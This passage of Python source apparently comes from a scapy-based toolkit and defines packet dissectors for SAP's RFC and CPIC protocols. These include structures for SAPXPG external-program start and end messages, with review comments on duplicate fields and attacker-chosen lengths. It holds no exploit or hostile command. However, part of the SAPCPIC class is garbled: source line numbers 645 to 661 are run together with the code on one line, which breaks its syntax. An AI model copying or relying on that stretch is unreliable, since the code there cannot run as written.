        # count_from is the constant 7: always seven DEF_FIELDS triplets.
        PacketListField("fields_test", None, DEF_FIELDS, count_from=lambda pkt: 7),
    ]
class SAPRFXPG_END(PacketNoPadded):
    """SAP Started program packets SAPRFXPG_END.

    Parsed by SAPCPIC2 when cpic_RFC_f is 'SAPXPG_END_XPG'. Same
    marker / length / value layout as SAPRFXPG.
    """
    name = "SAP Started SAPRFXPG_END packets"
    fields_desc = [
        StrFixedLenField("xpg_end_padd001", "\x05\x12\x02\x05", length=4),
        FieldLenField("xpg_end_ecode_l_len", None, length_of="xpg_end_ecode_l", fmt="!H"),
        StrLenField("xpg_end_ecode_l", "EXITCODE", length_from=lambda pkt: pkt.xpg_end_ecode_l_len),
        StrFixedLenField("xpg_end_padd002", "\x02\x05\x02\x05", length=4),
        FieldLenField("xpg_end_estat_l_len", None, length_of="xpg_end_estat_l", fmt="!H"),
        StrLenField("xpg_end_estat_l", "STRTSTAT", length_from=lambda pkt: pkt.xpg_end_estat_l_len),
        StrFixedLenField("xpg_end_padd003", "\x02\x05\x03\x01", length=4),
        FieldLenField("xpg_end_log_l_len", None, length_of="xpg_end_log_l", fmt="!H"),
        StrLenField("xpg_end_log_l", "LOG", length_from=lambda pkt: pkt.xpg_end_log_l_len),
        StrFixedLenField("xpg_end_padd004", "\x03\x01\x03\x30", length=4),
        FieldLenField("xpg_end_unk1_len", None, length_of="xpg_end_unk1", fmt="!H"),
        StrLenField("xpg_end_unk1", "\x00\x00\x00\x01", length_from=lambda pkt: pkt.xpg_end_unk1_len),
        StrFixedLenField("xpg_end_padd005", "\x03\x30\x03\x02", length=4),
        FieldLenField("xpg_end_unk2_len", None, length_of="xpg_end_unk2", fmt="!H"),
        StrLenField("xpg_end_unk2", "\x00\x00\x00\x80\x00\x00\x00\x00", length_from=lambda pkt: pkt.xpg_end_unk2_len),
    ]
class SAPCPIC2(PacketNoPadded):
    """SAP CPIC2 Packet

    Each optional length/value pair is preceded by a fixed-length marker
    field and is only parsed when that marker equals the matching entry of
    cpic_padd. A marker that does not match skips the pair without raising
    an error.
    """
    # NOTE(review): same display name as SAPCPIC.
    name = "SAP CPIC Packet"
    fields_desc = [
        StrFixedLenField("cpic_padd015_1", "", length=2),
        ConditionalField(FieldLenField("cpic_some_params_len", None, length_of="some_cpic_params", fmt="!H"), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),
        ConditionalField(PacketListField("some_cpic_params",None, SAPCPICPARAM, length_from=lambda pkt: pkt.cpic_some_params_len), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),
        StrFixedLenField("cpic_padd016", "", length=4),
        ConditionalField(FieldLenField("cpic_convid_label_len", None, length_of="cpic_convid_label", fmt="!H"), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),
        ConditionalField(StrLenField("cpic_convid_label", "", length_from=lambda pkt: pkt.cpic_convid_label_len), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),
        StrFixedLenField("cpic_padd017", "", length=4),
        ConditionalField(FieldLenField("cpic_kernel3_len", None, length_of="cpic_kernel3", fmt="!H"), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),
        ConditionalField(StrLenField("cpic_kernel3", "", length_from=lambda pkt: pkt.cpic_kernel3_len), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),
        StrFixedLenField("cpic_padd018", "", length=4),
        # cpic_RFC_f selects which payload structure is parsed further down.
        ConditionalField(FieldLenField("cpic_RFC_f_len", None, length_of="cpic_RFC_f", fmt="!H"), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),
        ConditionalField(StrLenField("cpic_RFC_f", "", length_from=lambda pkt: pkt.cpic_RFC_f_len), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),
        StrFixedLenField("cpic_padd019", "", length=4),
        ConditionalField(FieldLenField("cpic_unk4_len", None, length_of="cpic_unk4", fmt="!H"), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),
        ConditionalField(StrLenField("cpic_unk4", "", length_from=lambda pkt: pkt.cpic_unk4_len), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),
        # StrFixedLenField("cpic_padd020", "", length=4), #TODO: we send this field in original request
        # ConditionalField(FieldLenField("cpic_th_struct_len", None, length_of="cpic_th_struct", fmt="!H"), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),
        # ConditionalField(PacketListField("cpic_th_struct", None, SAPRFCTHStruct, length_from=lambda pkt: pkt.cpic_th_struct_len), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),
        StrFixedLenField("cpic_padd021", "", length=4),
        # Only the last two bytes of this marker are compared ([2:] on both sides).
        ConditionalField(FieldLenField("cpic_some_params2_len", None, length_of="some_cpic_params2", fmt="!H"), lambda pkt: pkt.cpic_padd021[2:] == cpic_padd["cpic_some_params2_padd"][2:]),
        ConditionalField(PacketListField("some_cpic_params2", None, SAPCPICPARAM2, length_from=lambda pkt: pkt.cpic_some_params2_len), lambda pkt: pkt.cpic_padd021[2:] == cpic_padd["cpic_some_params2_padd"][2:]),
        StrFixedLenField("cpic_padd022", "", length=4),
        ConditionalField(FieldLenField("cpic_unk6_len", None, length_of="cpic_unk6", fmt="!H"), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),
        ConditionalField(StrLenField("cpic_unk6", "", length_from=lambda pkt: pkt.cpic_unk6_len), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),
        StrFixedLenField("cpic_padd023", "", length=4),
        ConditionalField(FieldLenField("cpic_unk7_len", None, length_of="cpic_unk7", fmt="!H"), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),
        ConditionalField(StrLenField("cpic_unk7", "", length_from=lambda pkt: pkt.cpic_unk7_len), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),
        # Started PRG SAPXPG_START_XPG_LONG
        ConditionalField(PacketField("xpg_p", None, SAPRFXPG), lambda pkt: pkt.cpic_RFC_f == 'SAPXPG_START_XPG_LONG'),
        # End
        ConditionalField(PacketField("xpg_end", None, SAPRFXPG_END), lambda pkt: pkt.cpic_RFC_f in ['SAPXPG_END_XPG']),
        # Started PRG RFC_PING
        ConditionalField(PacketField("rfc_ping", None, SAPRFCPING), lambda pkt: pkt.cpic_RFC_f in ['RFC_PING']),
        StrFixedLenField("cpic_padd024", "", length=4),
        ConditionalField(FieldLenField("cpic_suff_len", None, length_of="cpic_suff", fmt="!H"), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),
        ConditionalField(PacketListField("cpic_suff", None, SAPCPICSUFFIX, length_from=lambda pkt: pkt.cpic_suff_len), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),
        StrFixedLenField("cpic_end_padd", "", length=4),
        ConditionalField(FieldLenField("cpic_end_len", None, length_of="cpic_end", fmt="!H"), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),
        ConditionalField(StrLenField("cpic_end", "", length_from=lambda pkt: pkt.cpic_end_len), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),
        StrFixedLenField("cpic_end_sig", "\x00\x00\xff\xff", length=4),
    ]
class SAPCPIC(PacketNoPadded):
    """SAP CPIC Packet

    Same marker-driven layout as SAPCPIC2, with an additional leading run
    of fields (addresses, kernel, destination, program, user names, client
    numbers). From cpic_padd015_1 onward the visible fields repeat the
    start of SAPCPIC2.
    """
    name = "SAP CPIC Packet"
    fields_desc = [
        StrFixedLenField("cpic_start_padd","", length=4),
        ConditionalField( ShortField("cpic_cpic_length", None), lambda pkt: pkt.cpic_start_padd== cpic_padd["cpic_start_padd"]),  # don't know what it is
        StrFixedLenField("cpic_padd0003", "", length=4),
        ConditionalField(FieldLenField("cpic_unk02_len", None, length_of="cpic_unk02", fmt="!H"), lambda pkt: pkt.cpic_padd0003 == cpic_padd["cpic_unk02_padd"]),
        ConditionalField(StrLenField("cpic_unk02", "", length_from=lambda pkt: pkt.cpic_unk02_len), lambda pkt: pkt.cpic_padd0003 == cpic_padd["cpic_unk02_padd"]),
        StrFixedLenField("cpic_padd0002", "", length=4),
        ConditionalField(FieldLenField("cpic_unk01_len", None, length_of="cpic_unk01", fmt="!H"), lambda pkt: pkt.cpic_padd0002 == cpic_padd["cpic_unk01_padd"]),
        ConditionalField(StrLenField("cpic_unk01", "", length_from=lambda pkt: pkt.cpic_unk01_len), lambda pkt: pkt.cpic_padd0002 == cpic_padd["cpic_unk01_padd"]),
        StrFixedLenField("cpic_padd0001", "", length=4),
        ConditionalField(FieldLenField("cpic_unk00_len", None, length_of="cpic_unk00", fmt="!H"), lambda pkt: pkt.cpic_padd0001 == cpic_padd["cpic_unk00_padd"]),
        ConditionalField(StrLenField("cpic_unk00", "", length_from=lambda pkt: pkt.cpic_unk00_len), lambda pkt: pkt.cpic_padd0001 == cpic_padd["cpic_unk00_padd"]),
        StrFixedLenField("cpic_padd001", "", length=4),
        ConditionalField(FieldLenField("cpic_ip_len", None, length_of="cpic_ip", fmt="!H"), lambda pkt: pkt.cpic_padd001 == cpic_padd["cpic_ip_padd"]),
        ConditionalField(StrLenField("cpic_ip", "", length_from=lambda pkt: pkt.cpic_ip_len), lambda pkt: pkt.cpic_padd001 == cpic_padd["cpic_ip_padd"]),
        StrFixedLenField("cpic_padd002", "", length=4),
        ConditionalField(FieldLenField("cpic_ip2_len", None, length_of="cpic_ip2", fmt="!H"),lambda pkt: pkt.cpic_padd002 == cpic_padd["cpic_ip_padd2"]),
        ConditionalField(StrLenField("cpic_ip2", "", length_from=lambda pkt: pkt.cpic_ip2_len),lambda pkt: pkt.cpic_padd002 == cpic_padd["cpic_ip_padd2"]),
        StrFixedLenField("cpic_padd003", "", length=4),
        ConditionalField(FieldLenField("cpic_host_sid_inbr_len", None, length_of="cpic_host_sid_inbr", fmt="!H"), lambda pkt: pkt.cpic_padd003 == cpic_padd["cpic_host_sid_inbr_padd"]),
        ConditionalField(StrLenField("cpic_host_sid_inbr", "", length_from=lambda pkt: pkt.cpic_host_sid_inbr_len), lambda pkt: pkt.cpic_padd003 == cpic_padd["cpic_host_sid_inbr_padd"]),
        StrFixedLenField("cpic_padd004", "", length=4),
        ConditionalField(FieldLenField("cpic_rfc_type_len", None, length_of="cpic_rfc_type", fmt="!H"), lambda pkt: pkt.cpic_padd004 == cpic_padd["cpic_rfc_type_padd"]),
        ConditionalField(StrLenField("cpic_rfc_type", "", length_from=lambda pkt: pkt.cpic_rfc_type_len), lambda pkt: pkt.cpic_padd004 == cpic_padd["cpic_rfc_type_padd"]),
        StrFixedLenField("cpic_padd005", "", length=4),
        ConditionalField(FieldLenField("cpic_kernel1_len", None, length_of="cpic_kernel1", fmt="!H"), lambda pkt: pkt.cpic_padd005 == cpic_padd["cpic_kernel1_padd"]),
        ConditionalField(StrLenField("cpic_kernel1", "", length_from=lambda pkt: pkt.cpic_kernel1_len), lambda pkt: pkt.cpic_padd005 == cpic_padd["cpic_kernel1_padd"]),
        StrFixedLenField("cpic_padd006", "", length=4),
        ConditionalField(FieldLenField("cpic_kernel2_len", None, length_of="cpic_kernel2", fmt="!H"), lambda pkt: pkt.cpic_padd006 == cpic_padd["cpic_kernel2_padd"]),
        ConditionalField(StrLenField("cpic_kernel2", "", length_from=lambda pkt: pkt.cpic_kernel2_len), lambda pkt: pkt.cpic_padd006 == cpic_padd["cpic_kernel2_padd"]),
        StrFixedLenField("cpic_padd007", "", length=4),
        ConditionalField(FieldLenField("cpic_dest_len", None, length_of="cpic_dest", fmt="!H"), lambda pkt: pkt.cpic_padd007 == cpic_padd["cpic_dest_padd"]),
        ConditionalField(StrLenField("cpic_dest", "", length_from=lambda pkt: pkt.cpic_dest_len), lambda pkt: pkt.cpic_padd007 == cpic_padd["cpic_dest_padd"]),
        StrFixedLenField("cpic_padd008", "", length=4),
        ConditionalField(FieldLenField("cpic_program_len", None, length_of="cpic_program", fmt="!H"), lambda pkt: pkt.cpic_padd008 == cpic_padd["cpic_program_padd"]),
        ConditionalField(StrLenField("cpic_program", "", length_from=lambda pkt: pkt.cpic_program_len), lambda pkt: pkt.cpic_padd008 == cpic_padd["cpic_program_padd"]),
        StrFixedLenField("cpic_padd009", "", length=4),
        ConditionalField(FieldLenField("cpic_username1_len", None, length_of="cpic_username1", fmt="!H"), lambda pkt: pkt.cpic_padd009 == cpic_padd["cpic_username1_padd"]),
        ConditionalField(StrLenField("cpic_username1", "", length_from=lambda pkt: pkt.cpic_username1_len), lambda pkt: pkt.cpic_padd009 == cpic_padd["cpic_username1_padd"]),
        StrFixedLenField("cpic_padd010", "", length=4),
        ConditionalField(FieldLenField("cpic_cli_nbr1_len", None, length_of="cpic_cli_nbr1", fmt="!H"), lambda pkt: pkt.cpic_padd010 == cpic_padd["cpic_cli_nbr1_padd"]),
        ConditionalField(StrLenField("cpic_cli_nbr1", "", length_from=lambda pkt: pkt.cpic_cli_nbr1_len), lambda pkt: pkt.cpic_padd010 == cpic_padd["cpic_cli_nbr1_padd"]),
        StrFixedLenField("cpic_padd011", "", length=4),
        ConditionalField(FieldLenField("cpic_unk1_len", None, length_of="cpic_unk1", fmt="!H"), lambda pkt: pkt.cpic_padd011 == cpic_padd["cpic_unk1_padd"]),
        ConditionalField(StrLenField("cpic_unk1", "", length_from=lambda pkt: pkt.cpic_unk1_len), lambda pkt: pkt.cpic_padd011 == cpic_padd["cpic_unk1_padd"]),
        StrFixedLenField("cpic_padd012", "", length=4),
        ConditionalField(FieldLenField("cpic_username2_len", None, length_of="cpic_username2", fmt="!H"), lambda pkt: pkt.cpic_padd012 == cpic_padd["cpic_username2_padd"]),
        ConditionalField(StrLenField("cpic_username2", "", length_from=lambda pkt: pkt.cpic_username2_len), lambda pkt: pkt.cpic_padd012 == cpic_padd["cpic_username2_padd"]),
        StrFixedLenField("cpic_padd013", "", length=4),
        ConditionalField(FieldLenField("cpic_cli_nbr2_len", None, length_of="cpic_cli_nbr2", fmt="!H"), lambda pkt: pkt.cpic_padd013 == cpic_padd["cpic_cli_nbr2_padd"]),
        ConditionalField(StrLenField("cpic_cli_nbr2", "", length_from=lambda pkt: pkt.cpic_cli_nbr2_len), lambda pkt: pkt.cpic_padd013 == cpic_padd["cpic_cli_nbr2_padd"]),
        StrFixedLenField("cpic_padd014", "", length=4),
        ConditionalField(FieldLenField("cpic_unk2_len", None, length_of="cpic_unk2", fmt="!H"), lambda pkt: pkt.cpic_padd014 == cpic_padd["cpic_unk2_padd"]),
        ConditionalField(StrLenField("cpic_unk2", "", length_from=lambda pkt: pkt.cpic_unk2_len), lambda pkt: pkt.cpic_padd014 == cpic_padd["cpic_unk2_padd"]),
        # dirty fix for the last packet
        StrFixedLenField("cpic_padd015_0", "", length=2),  # <---- last packets starts here
        StrFixedLenField("cpic_padd015_1", "", length=2),
        ConditionalField(FieldLenField("cpic_some_params_len", None, length_of="some_cpic_params", fmt="!H"), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),
        ConditionalField(PacketListField("some_cpic_params",None, SAPCPICPARAM, length_from=lambda pkt: pkt.cpic_some_params_len), lambda pkt: pkt.cpic_padd015_1 == cpic_padd["cpic_some_params_1_padd"]),
        StrFixedLenField("cpic_padd016", "", length=4),
        ConditionalField(FieldLenField("cpic_convid_label_len", None, length_of="cpic_convid_label", fmt="!H"), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),
        ConditionalField(StrLenField("cpic_convid_label", "", length_from=lambda pkt: pkt.cpic_convid_label_len), lambda pkt: pkt.cpic_padd016 == cpic_padd["cpic_convid_label_padd"]),
        StrFixedLenField("cpic_padd017", "", length=4),
        ConditionalField(FieldLenField("cpic_kernel3_len", None, length_of="cpic_kernel3", fmt="!H"), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),
        ConditionalField(StrLenField("cpic_kernel3", "", length_from=lambda pkt: pkt.cpic_kernel3_len), lambda pkt: pkt.cpic_padd017 == cpic_padd["cpic_kernel3_padd"]),
        StrFixedLenField("cpic_padd018", "", length=4),
        ConditionalField(FieldLenField("cpic_RFC_f_len", None, length_of="cpic_RFC_f", fmt="!H"), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),
        ConditionalField(StrLenField("cpic_RFC_f", "", length_from=lambda pkt: pkt.cpic_RFC_f_len), lambda pkt: pkt.cpic_padd018 == cpic_padd["cpic_RFC_f_padd"]),
        StrFixedLenField("cpic_padd019", "", length=4),
        ConditionalField(FieldLenField("cpic_unk4_len", None, length_of="cpic_unk4", fmt="!H"), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),
        ConditionalField(StrLenField("cpic_unk4",
"", length_from=lambda pkt: pkt.cpic_unk4_len), lambda pkt: pkt.cpic_padd019 == cpic_padd["cpic_unk4_padd"]),645 StrFixedLenField("cpic_padd020", "", length=4),646 ConditionalField(FieldLenField("cpic_th_struct_len", None, length_of="cpic_th_struct", fmt="!H"), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),647 ConditionalField(PacketListField("cpic_th_struct", None, SAPRFCTHStruct, length_from=lambda pkt: pkt.cpic_th_struct_len), lambda pkt: pkt.cpic_padd020 == cpic_padd["cpic_th_struct_padd"]),648 StrFixedLenField("cpic_padd021", "", length=4),649 ConditionalField(FieldLenField("cpic_some_params2_len", None, length_of="some_cpic_params2", fmt="!H"), lambda pkt: pkt.cpic_padd021 == cpic_padd["cpic_some_params2_padd"]),650 ConditionalField(PacketListField("some_cpic_params2", None, SAPCPICPARAM2, length_from=lambda pkt: pkt.cpic_some_params2_len), lambda pkt: pkt.cpic_padd021 == cpic_padd["cpic_some_params2_padd"]),651 StrFixedLenField("cpic_padd022", "", length=4),652 ConditionalField(FieldLenField("cpic_unk6_len", None, length_of="cpic_unk6", fmt="!H"), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),653 ConditionalField(StrLenField("cpic_unk6", "", length_from=lambda pkt: pkt.cpic_unk6_len), lambda pkt: pkt.cpic_padd022 == cpic_padd["cpic_unk6_padd"]),654 StrFixedLenField("cpic_padd023", "", length=4),655 ConditionalField(FieldLenField("cpic_unk7_len", None, length_of="cpic_unk7", fmt="!H"), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),656 ConditionalField(StrLenField("cpic_unk7", "", length_from=lambda pkt: pkt.cpic_unk7_len), lambda pkt: pkt.cpic_padd023 == cpic_padd["cpic_unk7_padd"]),657 # Started PRG SAPXPG_START_XPG_LONG658 ConditionalField(PacketField("xpg_p", None, SAPRFXPG), lambda pkt: pkt.cpic_RFC_f == 'SAPXPG_START_XPG_LONG'),659 # Started PRG RFC_PING660 ConditionalField(PacketField("rfc_ping", None, SAPRFCPING), lambda pkt: pkt.cpic_RFC_f == 'RFC_PING'),661 StrFixedLenField("cpic_padd024", "", 
length=4),
        ConditionalField(FieldLenField("cpic_suff_len", None, length_of="cpic_suff", fmt="!H"), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),
        ConditionalField(PacketListField("cpic_suff", None, SAPCPICSUFFIX, length_from=lambda pkt: pkt.cpic_suff_len), lambda pkt: pkt.cpic_padd024 == cpic_padd["cpic_suff_padd"]),
        StrFixedLenField("cpic_end_padd", "", length=4),
        ConditionalField(FieldLenField("cpic_end_len", None, length_of="cpic_end", fmt="!H"), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),
        ConditionalField(StrLenField("cpic_end", "", length_from=lambda pkt: pkt.cpic_end_len), lambda pkt: pkt.cpic_end_padd == cpic_padd["cpic_end_padd"]),
        StrFixedLenField("cpic_end_sig", "\x00\x00\xff\xff", length=4),
    ]


class SAPCPIC_CUT(PacketNoPadded):
    """Opaque fixed-size blob: a single 475-byte string field named ``keke1``.

    NOTE(review): the previous docstring ("SAP RFC TH structure.") looks copied
    from another class. In the SAPRFC layout below, the field called
    ``sap_cpic_cut`` is built from SAPCPIC2, not from this class, so confirm
    whether SAPCPIC_CUT is still referenced anywhere.
    """
    name = "SAP CUT"
    fields_desc = [
        # StrLenField("keke1", ""),
        StrFixedLenField("keke1", "",475),
    ]


class SAPRFC(PacketNoPadded):
    """SAP Remote Function Call packet

    This packet is used for the Remote Function Call (RFC) protocol.

    The layout is selected field by field through ConditionalField lambdas:
    ``version != 0x06`` exposes ``req_type`` and the gateway request fields,
    ``version == 0x06`` exposes ``func_type`` and the APPC/CPIC fields.

    Review notes:
      * Several field names appear twice in this list ("padd_v12", "padd_v3",
        "codepage", "codepage_padd2"). The conditions on the "padd_*" pairs are
        mutually exclusive; the two "codepage_padd2" entries share the same
        condition and differ only in length (4 and 7). How scapy resolves
        attribute access for duplicated names should be confirmed before
        relying on ``pkt.codepage`` or ``pkt.codepage_padd2``.
      * Flag tests use substring matching on ``str(pkt.info)``,
        ``str(pkt.info3)`` and ``str(pkt.vector)``; the exact string form
        depends on the installed scapy version -- TODO confirm.
      * All lengths used while dissecting (``codepage_size2`` for ``repl``)
        are read from the packet being parsed, so they are attacker-chosen
        when the input comes from the network.
    """
    fields_desc = [
        ByteField("version", 3), # If the version is 3, the packet has a size > 88h, versions 1 and 2 are 40h
        ConditionalField(ByteEnumKeysField("req_type", 0, rfc_req_type_values), lambda pkt: pkt.version != 0x06),
        ConditionalField(ByteEnumKeysField("func_type", 0, rfc_func_type_values), lambda pkt: pkt.version == 0x06),
        # Normal client fields (GW_NORMAL_CLIENT)
        ConditionalField(IPField("address", "0.0.0.0"), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(IntField("padd1", 0), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("service", "", length=10), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenField("codepage", "1100", length=4), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenField("padd2", "\x00" * 6, length=6), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("lu", "", length=8), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("tp", "", length=8), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("conversation_id", "", length=8), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(ByteField("appc_header_version", 6), lambda pkt: pkt.req_type == 0x03),
        # ConditionalField(ByteField("accept_info", 0xcb), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(FlagsField("accept_info", 0xcb, 8,
                                    ["EINFO", "PING", "SNC", "CONN_EINFO", "CODE_PAGE", "NIPING", "EXTINITOPT",
                                     "GW_ACCEPT_DIST_TRACE"]), lambda pkt: pkt.req_type == 0x03), # chipik
        ConditionalField(SignedShortField("idx", -1), lambda pkt: pkt.req_type == 0x03),
        # The IPv6 address is only present in version 3 of the normal-client request.
        ConditionalField(IP6Field("address6", "::"), lambda pkt: pkt.req_type == 0x03 and pkt.version == 3),
        ConditionalField(IntField("rc", 0), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(ByteField("echo_data", 0), lambda pkt: pkt.req_type == 0x03),
        ConditionalField(ByteField("filler", 0), lambda pkt: pkt.req_type == 0x03),
        # Monitor Command fields (GW_SEND_CMD)
        ConditionalField(ByteEnumKeysField("cmd", 0, rfc_monitor_cmd_values), lambda pkt: pkt.req_type == 0x09),
        # General padding for non implemented request types
        # (one byte shorter for req_type 0x09 because "cmd" already took a byte)
        ConditionalField(StrFixedLenField("padd_v12", "\x00" * 61, length=61),
                         lambda pkt: pkt.version < 3 and pkt.req_type == 0x09),
        ConditionalField(StrFixedLenField("padd_v12", "\x00" * 62, length=62),
                         lambda pkt: pkt.version < 3 and pkt.req_type not in [0x03, 0x09]),
        ConditionalField(StrFixedLenField("padd_v3", "\x00" * 133, length=133),
                         lambda pkt: pkt.version == 3 and pkt.req_type == 0x09),
        ConditionalField(StrFixedLenField("padd_v3", "\x00" * 134, length=134),
                         lambda pkt: pkt.version == 3 and pkt.req_type not in [0x03, 0x09]),
        # APPC layer POC for remote function call
        ConditionalField(ByteEnumKeysField("protocol", 0x3, appc_protocol_values), lambda pkt: pkt.version == 0x6),
        ConditionalField(ByteField("mode", 0x0), lambda pkt: pkt.version == 0x6),
        ConditionalField(ShortField("uid", 0x13), lambda pkt: pkt.version == 0x6),
        ConditionalField(ShortField("gw_id", 0x0), lambda pkt: pkt.version == 0x6),
        ConditionalField(ShortField("err_len", 0x0), lambda pkt: pkt.version == 0x6),
        # ConditionalField(ByteField("info2", 0x1), lambda pkt:pkt.version == 0x6), # bitfield
        ConditionalField(FlagsField("info2", 0, 8,
                                    ["WITH_LONG_LU_NAME", "GW_IMMEDIATE", "GW_SNC_ACTIVE", "GW_WAIT_LOOK_UP",
                                     "SNC_INIT_PHASE", "GW_STATELESS"]), lambda pkt: pkt.version == 0x6), # chipik
        ConditionalField(ByteField("trace_level", 0x1), lambda pkt: pkt.version == 0x6),
        ConditionalField(IntField("time", 0x0), lambda pkt: pkt.version == 0x6),
        # ConditionalField(ByteField("info3", 0x0), lambda pkt:pkt.version == 0x6), # bitfield
        ConditionalField(FlagsField("info3", 0, 8,
                                    ["GW_WITH_CODE_PAGE", "GW_ASYNC_RFC", "GW_CANCEL_HARD", "GW_CANCEL_SOFT",
                                     "GW_WITH_GUI_TIMEOUT", "GW_TERMIO_ERROR", "GW_EXTENDED_INIT_OPTIONS",
                                     "GW_DIST_TRACE"]), lambda pkt: pkt.version == 0x6), # chipik
        ConditionalField(SignedIntField("timeout", -1), lambda pkt: pkt.version == 0x6),
        ConditionalField(ByteField("info4", 0x0), lambda pkt: pkt.version == 0x6), # bitfield
        ConditionalField(IntField("seq_no", 0x0), lambda pkt: pkt.version == 0x6),
        # sap_param_len is filled from "sap_param" when building; the sap_param
        # PacketField further down has no length_from, so this value does not
        # bound how much is dissected.
        ConditionalField(FieldLenField("sap_param_len", None, length_of="sap_param", fmt="!H"),
                         lambda pkt: pkt.version == 0x6),
        ConditionalField(ByteField("padd_appc", 0x0), lambda pkt: pkt.version == 0x6), # bitfield
        ConditionalField(FlagsField("info", 0, 16,
                                    ["SYNC_CPIC_FUNCTION", "WITH_HOSTADDR", "WITH_GW_SAP_PARAMS_HDR", "CPIC_SYNC_REQ",
                                     "WITH_ERR_INFO", "DATA_WITH_TERM_OUTPUT", "DATA_WITH_TERM_INPUT",
                                     "R3_CPIC_LOGIN_WITH_TERM"]), lambda pkt: pkt.version == 0x6), # chipik C
        ConditionalField(FlagsField("vector", 0, 8,
                                    ["F_V_INITIALIZE_CONVERSATION", "F_V_ALLOCATE", "F_V_SEND_DATA", "F_V_RECEIVE",
                                     "F_V_FLUSH"]), lambda pkt: pkt.version == 0x6), # chipik C
        ConditionalField(IntEnumKeysField("appc_rc", 0x0, appc_rc_values), lambda pkt: pkt.version == 0x6),
        ConditionalField(IntEnumKeysField("sap_rc", 0x0, sap_rc_values), lambda pkt: pkt.version == 0x6),
        # NOTE(review): the default for this fixed-length string field is the int 0.
        ConditionalField(StrFixedLenField("conv_id", 0, 8), lambda pkt: pkt.version == 0x6),
        ConditionalField(PacketField("sap_ext_header", None, SAPRFCEXTEND), lambda pkt: pkt.version == 0x6 and 'GW_EXTENDED_INIT_OPTIONS' in str(pkt.info3)), # chipik
        ConditionalField(StrFixedLenField("cm_ok_padd", 0, 32),lambda pkt: pkt.version == 0x6 and "SYNC_CPIC_FUNCTION" in str(pkt.info) and "GW_WITH_CODE_PAGE" not in str(pkt.info3)), # chipik
        # Code page block, present only when GW_WITH_CODE_PAGE is set in info3.
        ConditionalField(IntField("codepage_size1", 0,),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(StrFixedLenField("codepage_padd1", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(IntField("codepage_size2", 0,),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(StrFixedLenField("codepage_padd2", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(StrFixedLenField("codepage_padd3", 0, 4),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(StrFixedLenField("codepage", 0, 5),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        # NOTE(review): second field named "codepage_padd2" (length 7); the first one above has length 4.
        ConditionalField(StrFixedLenField("codepage_padd2", 0, 7),lambda pkt: pkt.version == 0x6 and "GW_WITH_CODE_PAGE" in str(pkt.info3)), # chipik
        ConditionalField(PacketField("sap_param", None, SAPRFCDTStruct), lambda pkt: pkt.version == 0x6 and 'GW_DIST_TRACE' in str(pkt.info3)), # chipik
        # error message
        # StrField carries no length here, so it presumably takes every byte that
        # is left in the buffer when WITH_ERR_INFO is set -- TODO confirm.
        ConditionalField(StrField("error_msg", ""),lambda pkt: pkt.version == 0x6 and 'WITH_ERR_INFO' in str(pkt.info)),
        # F_V_SEND_DATA
